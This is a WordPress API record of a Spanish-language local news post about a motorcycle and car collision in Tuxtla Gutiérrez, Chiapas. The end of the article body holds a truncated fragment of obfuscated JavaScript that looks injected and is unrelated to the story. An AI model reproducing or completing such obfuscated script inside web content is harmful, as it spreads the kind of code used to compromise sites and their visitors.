{"id":16805,"date":"2024-07-19T04:19:35","date_gmt":"2024-07-19T04:19:35","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=16805"},"modified":"2024-07-19T04:19:36","modified_gmt":"2024-07-19T04:19:36","slug":"motociclista-y-particular-chocan-en-el-bulevar-serra-rojas","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=16805","title":{"rendered":"Motociclista y particular chocan en el Bulevar Serra Rojas"},"content":{"rendered":"\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"641\" data-id=\"16806\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/07\/FB_IMG_1721362586732-1024x641.jpg\" alt=\"\" class=\"wp-image-16806\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/07\/FB_IMG_1721362586732-1024x641.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/07\/FB_IMG_1721362586732-300x188.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/07\/FB_IMG_1721362586732-768x481.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/07\/FB_IMG_1721362586732.jpg 1080w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" data-id=\"16807\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/07\/FB_IMG_1721362583989-1024x768.jpg\" alt=\"\" class=\"wp-image-16807\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/07\/FB_IMG_1721362583989-1024x768.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/07\/FB_IMG_1721362583989-300x225.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/07\/FB_IMG_1721362583989-768x576.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/07\/FB_IMG_1721362583989.jpg 1080w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" data-id=\"16808\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/07\/FB_IMG_1721362581150-1024x768.jpg\" alt=\"\" class=\"wp-image-16808\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/07\/FB_IMG_1721362581150-1024x768.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/07\/FB_IMG_1721362581150-300x225.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/07\/FB_IMG_1721362581150-768x576.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/07\/FB_IMG_1721362581150.jpg 1080w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<\/figure>\n\n\n\n<p>Jairo Camacho.<\/p>\n\n\n\n<p>Agencia ReporteCiudano, 18 de julio del 2024. Tuxtla Guti\u00e9rrez. &#8211; Un motociclista y un automovil particular chocaron este jueves cuando circulaban en el Bulevar Andr\u00e9s Serra Rojas, frente a la Plaza Poliforum, de Tuxtla Guti\u00e9rrez.<\/p>\n\n\n\n<p>Los reportes oficiales informaron que, los conductores de una motocicleta Vento sal\u00edan de la plaza comercial e intentaron cruzar el Bulevar cuando fueron embestidos por la conductora de un Suzuki Swift de color rojo.<\/p>\n\n\n\n<p>La conductora del coche indic\u00f3 que, conduc\u00eda con preferencia de Sur a Norte, con preferencia cuando se atravesaron los motociclistas.<\/p>\n\n\n\n<p>Por el golpe salieron volando y se estrellaron contra el pavimento.<\/p>\n\n\n\n<p>Al lugar arribaron param\u00e9dicos de la Cruz Roja Mexicana para atender a los lesionados pero ninguno fue llevado al hospital.<\/p>\n\n\n\n<p>En el lugar los involucrados llegaron a un acuerdo armonioso y se retiraron del lugar.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho. Agencia ReporteCiudano, 18 de julio del 2024. Tuxtla Guti\u00e9rrez. &#8211; Un motociclista y un automovil particular chocaron este jueves cuando circulaban en el Bulevar Andr\u00e9s Serra Rojas, frente a la Plaza Poliforum, de Tuxtla Guti\u00e9rrez. Los reportes oficiales informaron que, los conductores de una motocicleta Vento sal\u00edan de la plaza comercial e intentaron &hellip;<\/p>\n","protected":false},"author":2,"featured_media":16806,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-16805","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/16805","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=16805"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/16805\/revisions"}],"predecessor-version":[{"id":16809,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/16805\/revisions\/16809"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/16806"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=16805"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=16805"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=16805"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}